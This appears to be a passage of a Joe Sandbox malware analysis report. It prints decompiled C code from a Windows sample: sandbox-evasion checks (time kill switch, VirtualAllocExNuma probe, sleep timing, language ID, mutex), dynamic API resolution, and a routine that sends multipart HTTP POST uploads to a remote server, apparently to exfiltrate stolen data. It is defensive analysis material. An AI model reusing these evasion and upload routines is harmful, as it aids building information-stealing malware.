Instruction ID: 9bcd284fde1af5afdb9725a1d8ee7eb933c8521e96d2c529a01ce852b5064599
Opcode Fuzzy Hash: 5c6a11f3020753ac3d423ac2ff1df36a17615fb2ca3194d898380672604674f4
Instruction Fuzzy Hash: 9C820FF9523200EFC345DFA8EE889D637B9BB4C251715CA39E509C3661D73894A1CF2A

Uniqueness

Uniqueness Score: -1.00%

Function 004068F0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75
timestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E004068F0(void* __ecx, void* __eflags) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				char _v284;
				struct _SYSTEMTIME _v300;
				struct _SYSTEMTIME _v316;
				int _t45;
				char* _t52;
				intOrPtr _t57;
				void* _t66;

				E0040B720( &_v284, 0x104);
				_v300.wYear = 0;
				_v300.wMonth = 0;
				_v300.wDay = 0;
				_v300.wMinute = 0;
				_v300.wMilliseconds = 0;
				_v316.wYear = 0;
				_v316.wMonth = 0;
				_v316.wDay = 0;
				_v316.wMinute = 0;
				_v316.wMilliseconds = 0;
				_v20.dwLowDateTime = 0;
				_v20.dwHighDateTime = 0;
				_v12.dwLowDateTime = 0;
				_v12.dwHighDateTime = 0;
				GetSystemTime( &_v300);
				_t57 =  *0x41a60c; // 0x625850
				 *0x41aa24( &_v284, _t57);
				_t52 =  *0x41a104; // 0x6257b0
				sscanf( &_v284, _t52,  &(_v316.wDay),  &(_v316.wMonth),  &_v316,  &(_v316.wHour),  &(_v316.wMinute),  &(_v316.wSecond));
				SystemTimeToFileTime( &_v300,  &_v20);
				_t45 = SystemTimeToFileTime( &_v316,  &_v12);
				_t66 = _v20.dwHighDateTime - _v12.dwHighDateTime;
				if(_t66 >= 0 && (_t66 > 0 || _v20.dwLowDateTime > _v12.dwLowDateTime)) {
					ExitProcess(0); // executed
				}
				return _t45;
			}

0x00406905
0x0040690c
0x00406915
0x0040691b
0x00406921
0x00406927
0x00406930
0x00406939
0x0040693f
0x00406945
0x0040694b
0x00406952
0x0040695b
0x0040695e
0x00406967
0x00406971
0x00406977
0x00406985
0x004069b5
0x004069c3
0x004069d7
0x004069e8
0x004069f1
0x004069f4
0x00406a02
0x00406a02
0x00406a0b

APIs

GetSystemTime.KERNEL32(?,?,00000104), ref: 00406971
lstrcat.KERNEL32(?,00625850), ref: 00406985
sscanf.NTDLL ref: 004069C3
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004069D7
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004069E8
ExitProcess.KERNEL32 ref: 00406A02

Strings

PXb, xrefs: 00406977

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: Time$System$File$ExitProcesslstrcatsscanf
String ID: PXb
API String ID: 2797641603-1109598346
Opcode ID: 7d7e2839d62a1b1f45abe4f978373fb08f06d061ffb6add98bc378f3cfdedde8
Instruction ID: e1bd8726115975e68c113ba4c939dbea9fdba7e28f8895f6eace496917ca047b
Opcode Fuzzy Hash: 7d7e2839d62a1b1f45abe4f978373fb08f06d061ffb6add98bc378f3cfdedde8
Instruction Fuzzy Hash: A531AEB5D1121CABCB58DF94DD85ADEB7B9AF48300F0085EAE10AA3150EB345B94CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00406B60, Relevance: 6.0, APIs: 4, Instructions: 49
threadsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			_entry_() {
				void* _t5;
				void* _t8;
				void* _t9;
				void* _t10;
				void* _t16;

				E0040C290(_t16); // executed
				E00401770(); // executed
				E0040C2E0(); // executed
				E00401050(_t16, 0x3e8); // executed
				_t5 = E00406AA0(); // executed
				_t19 = _t5;
				if(_t5 != 0) {
					_t8 = E00406AF0(_t19); // executed
					if(_t8 == 0) {
						_t9 = E00406A10(); // executed
						if(_t9 != 0) {
							_t10 = E00406B30(); // executed
							_t22 = _t10;
							if(_t10 != 0) {
								E00401940(); // executed
								E0040C4A0(); // executed
								CreateThread(0, 0, E00401020, 0, 0, 0); // executed
								E004068F0(_t16, _t22); // executed
								CreateThread(0, 0, E00406650, 0, 0, 0);
							}
						}
					}
				}
				while(1 != 0) {
					if( *0x41abb4 == 0) {
						Sleep(0x3e7);
						continue;
					}
					break;
				}
				E0040BFA0(_t16);
				ExitProcess(0);
			}

0x00406b63
0x00406b68
0x00406b6d
0x00406b77
0x00406b7f
0x00406b84
0x00406b86
0x00406b88
0x00406b8f
0x00406b91
0x00406b98
0x00406b9a
0x00406b9f
0x00406ba1
0x00406ba3
0x00406ba8
0x00406bbc
0x00406bc2
0x00406bd6
0x00406bd6
0x00406ba1
0x00406b98
0x00406b8f
0x00406bdc
0x00406bec
0x00406bf5
0x00000000
0x00406bf5
0x00000000
0x00406bee
0x00406bfd
0x00406c04

APIs

Part of subcall function 0040C2E0: GetProcAddress.KERNEL32(73B60000,00610E00), ref: 0040C332
Part of subcall function 0040C2E0: GetProcAddress.KERNEL32(73B60000,0060F5D0), ref: 0040C34A
Part of subcall function 0040C2E0: GetProcAddress.KERNEL32(73B60000,0060A948), ref: 0040C362
Part of subcall function 0040C2E0: GetProcAddress.KERNEL32(73B60000,00610CF8), ref: 0040C37B
Part of subcall function 0040C2E0: GetProcAddress.KERNEL32(73B60000,00610B90), ref: 0040C393
Part of subcall function 0040C2E0: GetProcAddress.KERNEL32(73B60000,00610D58), ref: 0040C3AB
Part of subcall function 0040C2E0: GetProcAddress.KERNEL32(73B60000,00610B18), ref: 0040C3C4
Part of subcall function 0040C2E0: GetProcAddress.KERNEL32(73B60000,00610D70), ref: 0040C3DC
Part of subcall function 0040C2E0: GetProcAddress.KERNEL32(73B60000,0060A9A8), ref: 0040C3F4
Part of subcall function 0040C2E0: GetProcAddress.KERNEL32(73B60000,0060A9C8), ref: 0040C40D
Part of subcall function 0040C2E0: GetProcAddress.KERNEL32(73B60000,VirtualAllocExNuma), ref: 0040C423
Part of subcall function 0040C2E0: LoadLibraryA.KERNELBASE(00610C68,?,00406B72), ref: 0040C435
Part of subcall function 0040C2E0: LoadLibraryA.KERNELBASE(00610C98,?,00406B72), ref: 0040C447
Part of subcall function 0040C2E0: GetProcAddress.KERNEL32(73AE0000,00610DA0), ref: 0040C468

Part of subcall function 00401050: GetCurrentProcess.KERNEL32(00000000,?,00003000,00000040,00000000,?,?,00406B7C,000003E8), ref: 0040106A
Part of subcall function 00401050: VirtualAllocExNuma.KERNELBASE(00000000,?,?,00406B7C,000003E8), ref: 00401071
Part of subcall function 00401050: ExitProcess.KERNEL32 ref: 00401082

Part of subcall function 00406AA0: GetTickCount.KERNEL32 ref: 00406AA6
Part of subcall function 00406AA0: Sleep.KERNELBASE(00002710,?,00406B84), ref: 00406AB4
Part of subcall function 00406AA0: GetTickCount.KERNEL32 ref: 00406ABA

Sleep.KERNEL32(000003E7), ref: 00406BF5

Part of subcall function 00406A10: GetUserDefaultLangID.KERNEL32 ref: 00406A1D

Part of subcall function 00406B30: CreateMutexA.KERNELBASE(00000000,00000000,00625A10,?,00406B9F), ref: 00406B3D
Part of subcall function 00406B30: GetLastError.KERNEL32(?,00406B9F), ref: 00406B43

Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(73B60000,00627FC0), ref: 0040C4BD
Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(73B60000,00627FF0), ref: 0040C4D5
Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(73B60000,00625B50), ref: 0040C4EE
Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(73B60000,00627F30), ref: 0040C506
Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(73B60000,00627DF8), ref: 0040C51E
Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(73B60000,00627E28), ref: 0040C537
Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(73B60000,00627D50), ref: 0040C54F
Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(73B60000,00627D80), ref: 0040C567
Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(73B60000,00627E88), ref: 0040C580
Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(73B60000,00627E58), ref: 0040C598
Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(73B60000,00627E70), ref: 0040C5B0
Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(73B60000,00627EA0), ref: 0040C5C9
Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(73B60000,00627D98), ref: 0040C5E1
Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(73B60000,006259B0), ref: 0040C5F9
Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(73B60000,00627F60), ref: 0040C612
Part of subcall function 0040C4A0: GetProcAddress.KERNEL32(73B60000,00625830), ref: 0040C62A

CreateThread.KERNELBASE(00000000,00000000,00401020,00000000,00000000,00000000), ref: 00406BBC

Part of subcall function 004068F0: GetSystemTime.KERNEL32(?,?,00000104), ref: 00406971
Part of subcall function 004068F0: lstrcat.KERNEL32(?,00625850), ref: 00406985
Part of subcall function 004068F0: sscanf.NTDLL ref: 004069C3
Part of subcall function 004068F0: SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004069D7
Part of subcall function 004068F0: SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004069E8
Part of subcall function 004068F0: ExitProcess.KERNEL32 ref: 00406A02

CreateThread.KERNEL32(00000000,00000000,00406650,00000000,00000000,00000000), ref: 00406BD6
ExitProcess.KERNEL32 ref: 00406C04

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: AddressProc$Time$Process$CreateExitSystem$CountFileLibraryLoadSleepThreadTick$AllocCurrentDefaultErrorLangLastMutexNumaUserVirtuallstrcatsscanf
String ID:
API String ID: 482147807-0
Opcode ID: a349654e72635f791abaff99105bb45aa78bda0ff43d1d0459ce1a65ca71d6f4
Instruction ID: 30edc539181f4161086e76151398ed8f709a9372c098ffe2502fb7c446d8bec9
Opcode Fuzzy Hash: a349654e72635f791abaff99105bb45aa78bda0ff43d1d0459ce1a65ca71d6f4
Instruction Fuzzy Hash: 2101FFB0385365AAE12037A25D17B5935685F00B49F12403BB603F81E2EEBDF460992F

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC50, Relevance: 4.5, APIs: 3, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040AC50() {
				void* _v8;
				long _v12;
				int _t9;

				_v8 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_v12 = 0x104;
				_t9 = GetComputerNameA(_v8,  &_v12); // executed
				if(_t9 != 0) {
					return _v8;
				}
				return 0x4191a0;
			}

0x0040ac6a
0x0040ac6d
0x0040ac7c
0x0040ac84
0x00000000
0x0040ac8f
0x00000000

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,00406B8D), ref: 0040AC5D
RtlAllocateHeap.NTDLL(00000000,?,00406B8D), ref: 0040AC64
GetComputerNameA.KERNEL32(00406B8D,00000104), ref: 0040AC7C

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: 84f9db92fad3da76f05b9e0e3be3efdf369b695c41f802971e80cd0f33aa4693
Instruction ID: 037935987c21b56ac9d2f6c82646566d18e4d0dbb1ca3967d9f30a297ca29eed
Opcode Fuzzy Hash: 84f9db92fad3da76f05b9e0e3be3efdf369b695c41f802971e80cd0f33aa4693
Instruction Fuzzy Hash: CDE012B4A05208BBE700DFE49A49ADD7BBCAB04301F104565E945E2280E6759E94D756

Uniqueness

Uniqueness Score: -1.00%

Function 00401050, Relevance: 4.5, APIs: 3, Instructions: 21
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E00401050(void* __ecx, intOrPtr _a4) {
				int _v8;
				int _t7;

				_v8 = 0;
				_t7 =  *0x41aa50(GetCurrentProcess(), 0, _a4, 0x3000, 0x40, 0, __ecx); // executed
				_v8 = _t7;
				if(_v8 == 0) {
					ExitProcess(0);
				}
				return _t7;
			}

0x00401054
0x00401071
0x00401077
0x0040107e
0x00401082
0x00401082
0x0040108b

APIs

GetCurrentProcess.KERNEL32(00000000,?,00003000,00000040,00000000,?,?,00406B7C,000003E8), ref: 0040106A
VirtualAllocExNuma.KERNELBASE(00000000,?,?,00406B7C,000003E8), ref: 00401071
ExitProcess.KERNEL32 ref: 00401082

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: a7ae97adfdcf1c4e94bd862cfdc75439cc7b9fc2d70a57af4b78a5be23439a3a
Instruction ID: cf04ec476d4c872812d4618a66134526bca4da81b147f74e7f68079ffca38a05
Opcode Fuzzy Hash: a7ae97adfdcf1c4e94bd862cfdc75439cc7b9fc2d70a57af4b78a5be23439a3a
Instruction Fuzzy Hash: C4E08670586308FFEB109F90DD09B997BA8EB04712F108054FA09A72C0C6B45A50CA5E

Uniqueness

Uniqueness Score: -1.00%

Function 00406B30, Relevance: 3.0, APIs: 2, Instructions: 15
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406B30() {
				CHAR* _t1;

				_t1 =  *0x41a124; // 0x625a10
				CreateMutexA(0, 0, _t1); // executed
				if(GetLastError() != 0xb7) {
					return 1;
				}
				return 0;
			}

0x00406b33
0x00406b3d
0x00406b4e
0x00000000
0x00406b54
0x00000000

APIs

CreateMutexA.KERNELBASE(00000000,00000000,00625A10,?,00406B9F), ref: 00406B3D
GetLastError.KERNEL32(?,00406B9F), ref: 00406B43

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: CreateErrorLastMutex
String ID:
API String ID: 1925916568-0
Opcode ID: 8b87618f3880a66b23dbcc435febca6ef014f7b8e04fe950b3c97caf62bd947d
Instruction ID: 327de0e026df715b7b38ea4147415e649a308c5b1f966a57182a2e21aaf30096
Opcode Fuzzy Hash: 8b87618f3880a66b23dbcc435febca6ef014f7b8e04fe950b3c97caf62bd947d
Instruction Fuzzy Hash: 93D012B0266205EBE7102794FC49BF637A99744701F214832F10EE61D2C669FCA0462F

Uniqueness

Uniqueness Score: -1.00%

Function 004607A6, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Module32First.KERNEL32(00000000,00000224), ref: 004607EE

Memory Dump Source

Source File: 00000014.00000002.775729176.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_460000_7CA1.jbxd

Similarity

API ID: FirstModule32
String ID:
API String ID: 3757679902-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 1239f32995957c08f45ed2a3d9b4aaeff938c334b92bfb8aea7e0d09fa2cd5a1
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: C2F096312017116FD7203BF5988DB6FB7E8AF49766F10052AE643911C0EB78FD458E66

Uniqueness

Uniqueness Score: -1.00%

Function 00460465, Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 004604B6

Memory Dump Source

Source File: 00000014.00000002.775729176.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_460000_7CA1.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: a0493acab3598a450f74e59e88bf279398e2f0fd6f2714a22ff48452b0c7c613
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 64116C79A00208EFCB01DF98CA85E99BBF1AF08350F058095FA489B362D775EA50DF80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404BE0, Relevance: 115.9, APIs: 56, Strings: 10, Instructions: 371
stringnetworkmemoryCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E00404BE0(void* __ecx, void* __eflags, intOrPtr _a4, char* _a8, char* _a12, intOrPtr _a16, int _a20, intOrPtr _a24) {
				void _v8;
				char _v516;
				void* _v520;
				char _v1028;
				void* _v1032;
				void _v1548;
				void* _v1552;
				long _v1556;
				long _v1560;
				char _v6564;
				void* _v6568;
				long _v6572;
				void _v6828;
				DWORD* _v6832;
				DWORD* _v6836;
				void* _v6840;
				intOrPtr _v6844;
				DWORD* _v6848;
				void _v8852;
				int _v8856;
				long _v8860;
				void* _t132;
				intOrPtr _t154;
				intOrPtr _t169;
				intOrPtr _t172;
				void* _t176;
				DWORD* _t204;
				char* _t207;
				char* _t219;
				intOrPtr _t221;
				intOrPtr _t225;
				char* _t239;
				intOrPtr _t248;
				char* _t251;
				void* _t275;
				void* _t276;

				_t211 = __ecx;
				E004139B0(0x2298, __ecx);
				E0040B6E0(_t211,  &_v6564, 0, 0x1388);
				E0040B720( &_v516, 0x1f4);
				E0040B720( &_v1548, 0x200);
				_v1552 = RtlAllocateHeap(GetProcessHeap(), 0, 0x800000);
				E0040B720( &_v1028, 0x1f4);
				_v520 = InternetOpenA(0, 1, 0, 0, 0);
				_v8 = 0x927c0;
				_t213 =  &_v8;
				InternetSetOptionA(_v520, 2,  &_v8, 4);
				_v6572 = 0x100;
				_v1556 = 0;
				_push("https://");
				_push(_a4);
				if( *0x41aa4c() == 0) {
					_v1556 = 1;
				}
				_t280 = _v520;
				if(_v520 != 0) {
					_t132 = E0040B8B0(_t213, _t280, 0x10);
					_t276 = _t276 + 4;
					 *0x41aa24( &_v516, _t132);
					 *0x41aa24(_v1552, "\r\n");
					 *0x41aa24(_v1552, "------");
					 *0x41aa24(_v1552,  &_v516);
					 *0x41aa24(_v1552, "--");
					 *0x41aa24(_v1552, "\r\n");
					_t248 =  *0x41a1bc; // 0x623348
					 *0x41aa24( &_v1028, _t248);
					 *0x41aa24( &_v1028,  &_v516);
					if(_v1556 == 0) {
						_v6568 = InternetConnectA(_v520, _a8, 0x50, 0, 0, 3, 0, 0);
					} else {
						_v6568 = InternetConnectA(_v520, _a8, 0x1bb, 0, 0, 3, 0, 0);
					}
					if(_v6568 != 0) {
						if(_v1556 == 0) {
							_t251 =  *0x41a2d8; // 0x628110
							_t219 =  *0x41a590; // 0x627bb0
							_v1032 = HttpOpenRequestA(_v6568, _t219, _a12, _t251, 0, 0, 0x400100, 0);
						} else {
							_t239 =  *0x41a2d8; // 0x628110
							_t207 =  *0x41a590; // 0x627bb0
							_v1032 = HttpOpenRequestA(_v6568, _t207, _a12, _t239, 0, 0, 0xc00100, 0);
						}
						if(_v1032 != 0) {
							 *0x41aa24( &_v1548, "------");
							 *0x41aa24( &_v1548,  &_v516);
							 *0x41aa24( &_v1548, "\r\n");
							_t221 =  *0x41a2cc; // 0x626960
							 *0x41aa24( &_v1548, _t221);
							_t154 =  *0x41a058; // 0x627a90
							 *0x41aa24( &_v1548, _t154);
							 *0x41aa24( &_v1548, "\"\r\n\r\n");
							 *0x41aa24( &_v1548, _a16);
							 *0x41aa24( &_v1548, "\r\n");
							 *0x41aa24( &_v1548, "------");
							 *0x41aa24( &_v1548,  &_v516);
							 *0x41aa24( &_v1548, "\r\n");
							_t225 =  *0x41a644; // 0x623548
							 *0x41aa24( &_v1548, _t225);
							 *0x41aa24( &_v1548, _a16);
							 *0x41aa24( &_v1548, "\"\r\n");
							_t169 =  *0x41a038; // 0x626c60
							 *0x41aa24( &_v1548, _t169);
							 *0x41aa24( &_v1548, "\r\n");
							_t172 =  *0x41a538; // 0x626b10
							 *0x41aa24( &_v1548, _t172);
							 *0x41aa24( &_v1548, "\r\n\r\n");
							_t176 =  *0x41a908( &_v1548);
							_v1560 = _t176 + _a24 +  *0x41a908(_v1552);
							_v6840 = RtlAllocateHeap(GetProcessHeap(), 0, _v1560);
							memcpy(_v6840,  &_v1548,  *0x41a908( &_v1548));
							memcpy(_v6840 +  *0x41a908(_a24),  &_v1548, _a20);
							memcpy( *0x41a908( *0x41a908(_v1552)) + _a24 + _v6840,  &_v1548, _v1552);
							_v6848 = 0;
							while(_v6848 < 6) {
								HttpSendRequestA(_v1032,  &_v1028,  *0x41a908(_v1560),  &_v1028, _v6840);
								if(HttpQueryInfoA(_v1032, 0x13,  &_v6828,  &_v6572, 0) == 0) {
									L17:
									Sleep(0x7530);
									_t204 =  &(_v6848[0]);
									__eflags = _t204;
									_v6848 = _t204;
									continue;
								} else {
									_push("200");
									_push( &_v6828);
									if( *0x41aa4c() != 0) {
										goto L17;
									} else {
									}
								}
								break;
							}
							E0040B720( &_v6840, 4);
							_v6836 = 0;
							_v6832 = 0;
							_v6844 = 0x4000;
							while(1) {
								_v8856 = InternetReadFile(_v1032,  &_v8852, 0x7cf,  &_v8860);
								if(_v8856 == 0) {
									break;
								}
								_t289 = _v8860;
								if(_v8860 != 0) {
									 *((char*)(_t275 + _v8860 - 0x2290)) = 0;
									 *0x41aa24( &_v6564,  &_v8852);
									continue;
								}
								break;
							}
						}
					}
				}
				InternetCloseHandle(_v1032);
				InternetCloseHandle(_v6568);
				InternetCloseHandle(_v520);
				return E00404830(_v520, _t289,  &_v6564);
			}

0x00404be0
0x00404be8
0x00404bfc
0x00404c0d
0x00404c1e
0x00404c37
0x00404c49
0x00404c5e
0x00404c64
0x00404c6d
0x00404c7a
0x00404c80
0x00404c8a
0x00404c94
0x00404c9c
0x00404ca5
0x00404ca7
0x00404ca7
0x00404cb1
0x00404cb8
0x00404cc0
0x00404cc5
0x00404cd0
0x00404ce2
0x00404cf4
0x00404d08
0x00404d1a
0x00404d2c
0x00404d32
0x00404d40
0x00404d54
0x00404d61
0x00404da8
0x00404d63
0x00404d83
0x00404d83
0x00404db5
0x00404dc2
0x00404e00
0x00404e0b
0x00404e1f
0x00404dc4
0x00404dcf
0x00404dda
0x00404ded
0x00404ded
0x00404e2c
0x00404e3e
0x00404e52
0x00404e64
0x00404e6a
0x00404e78
0x00404e7e
0x00404e8b
0x00404e9d
0x00404eae
0x00404ec0
0x00404ed2
0x00404ee6
0x00404ef8
0x00404efe
0x00404f0c
0x00404f1d
0x00404f2f
0x00404f35
0x00404f42
0x00404f54
0x00404f5a
0x00404f67
0x00404f79
0x00404f86
0x00404fa0
0x00404fbc
0x00404fde
0x00405000
0x00405032
0x00405038
0x00405053
0x00405086
0x004050ad
0x004050c7
0x004050cc
0x0040504a
0x0040504a
0x0040504d
0x00000000
0x004050af
0x004050af
0x004050ba
0x004050c3
0x00000000
0x00000000
0x004050c5
0x004050c3
0x00000000
0x004050ad
0x004050e0
0x004050e5
0x004050ef
0x004050f9
0x00405103
0x00405123
0x00405130
0x00000000
0x00000000
0x00405132
0x00405139
0x00405143
0x00405159
0x00000000
0x00405159
0x00000000
0x00405139
0x0040513b
0x00404e2c
0x00404db5
0x00405168
0x00405175
0x00405182
0x0040519b

APIs

GetProcessHeap.KERNEL32(00000000,00800000,?,00000200,?,000001F4,?,00000000,00001388,?,?,00406843,006109A0,00625B10,006277E8,?), ref: 00404C2A
RtlAllocateHeap.NTDLL(00000000), ref: 00404C31
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404C58
InternetSetOptionA.WININET(?,00000002,000927C0,00000004), ref: 00404C7A
StrCmpCA.SHLWAPI(?,https://), ref: 00404C9D
lstrcat.KERNEL32(?,00000000), ref: 00404CD0
lstrcat.KERNEL32(?,00418B9C), ref: 00404CE2
lstrcat.KERNEL32(?,------), ref: 00404CF4
lstrcat.KERNEL32(?,?), ref: 00404D08
lstrcat.KERNEL32(?,00418BA8), ref: 00404D1A
lstrcat.KERNEL32(?,00418B9C), ref: 00404D2C
lstrcat.KERNEL32(?,00623348), ref: 00404D40
lstrcat.KERNEL32(?,?), ref: 00404D54
InternetConnectA.WININET(?,?,000001BB,00000000,00000000,00000003,00000000,00000000), ref: 00404D7D
InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 00404DA2
HttpOpenRequestA.WININET(00000000,00627BB0,?,00628110,00000000,00000000,00C00100,00000000), ref: 00404DE7
HttpOpenRequestA.WININET(00000000,00627BB0,?,00628110,00000000,00000000,00400100,00000000), ref: 00404E19
lstrcat.KERNEL32(?,------), ref: 00404E3E
lstrcat.KERNEL32(?,?), ref: 00404E52
lstrcat.KERNEL32(?,00418B9C), ref: 00404E64
lstrcat.KERNEL32(?,00626960), ref: 00404E78
lstrcat.KERNEL32(?,00627A90), ref: 00404E8B
lstrcat.KERNEL32(?,"), ref: 00404E9D
lstrcat.KERNEL32(?,?), ref: 00404EAE
lstrcat.KERNEL32(?,00418B9C), ref: 00404EC0
lstrcat.KERNEL32(?,------), ref: 00404ED2
lstrcat.KERNEL32(?,?), ref: 00404EE6
lstrcat.KERNEL32(?,00418B9C), ref: 00404EF8
lstrcat.KERNEL32(?,00623548), ref: 00404F0C
lstrcat.KERNEL32(?,?), ref: 00404F1D
lstrcat.KERNEL32(?,"), ref: 00404F2F
lstrcat.KERNEL32(?,00626C60), ref: 00404F42
lstrcat.KERNEL32(?,00418B9C), ref: 00404F54
lstrcat.KERNEL32(?,00626B10), ref: 00404F67
lstrcat.KERNEL32(?,), ref: 00404F79
lstrlen.KERNEL32(?), ref: 00404F86
lstrlen.KERNEL32(?), ref: 00404F98
GetProcessHeap.KERNEL32(00000000,?), ref: 00404FAF
RtlAllocateHeap.NTDLL(00000000), ref: 00404FB6
lstrlen.KERNEL32(?), ref: 00404FC9
memcpy.NTDLL(?,?,00000000), ref: 00404FDE
lstrlen.KERNEL32(?,?,?), ref: 00404FF3
memcpy.NTDLL(?), ref: 00405000
lstrlen.KERNEL32(?), ref: 0040500D
lstrlen.KERNEL32(?,?,00000000), ref: 00405022
memcpy.NTDLL(?), ref: 00405032
lstrlen.KERNEL32(?,?,?), ref: 00405071
HttpSendRequestA.WININET(00000000,?,00000000), ref: 00405086
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 004050A5
StrCmpCA.SHLWAPI(?,200), ref: 004050BB
Sleep.KERNEL32(00007530), ref: 004050CC
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040511D
lstrcat.KERNEL32(?,00000000), ref: 00405159
InternetCloseHandle.WININET(?), ref: 00405168
InternetCloseHandle.WININET(?), ref: 00405175
InternetCloseHandle.WININET(00000000), ref: 00405182

Strings

`ib, xrefs: 00404E6A
, xrefs: 00404F6D
", xrefs: 00404F23
------, xrefs: 00404CE8, 00404E32, 00404EC6
", xrefs: 00404E91
`lb, xrefs: 00404F35
H3b, xrefs: 00404D32
H5b, xrefs: 00404EFE
https://, xrefs: 00404C94
200, xrefs: 004050AF

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: lstrcat$Internet$lstrlen$HeapHttp$CloseHandleOpenRequestmemcpy$AllocateConnectProcess$FileInfoOptionQueryReadSendSleep
String ID: $"$"$------$200$H3b$H5b$`ib$`lb$https://
API String ID: 3074752877-2881643390
Opcode ID: 7e193f7b750088dcc95744bcbbb277857cdff21b1dcf883b5ec6c60b5828c7ff
Instruction ID: e23421f7279307ab3a44037bb1bbfee425b9f76c6f481fad167fe3b69a740ec5
Opcode Fuzzy Hash: 7e193f7b750088dcc95744bcbbb277857cdff21b1dcf883b5ec6c60b5828c7ff
Instruction Fuzzy Hash: BDF176B5A51218AFCB20DFA0DD48FDB7779AF48704F0085D9F209A7181CB78AA94CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004087E0, Relevance: 40.6, APIs: 21, Strings: 2, Instructions: 337
fileCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E004087E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, signed int _a28, signed int _a32, signed int _a36) {
				char _v268;
				void* _v272;
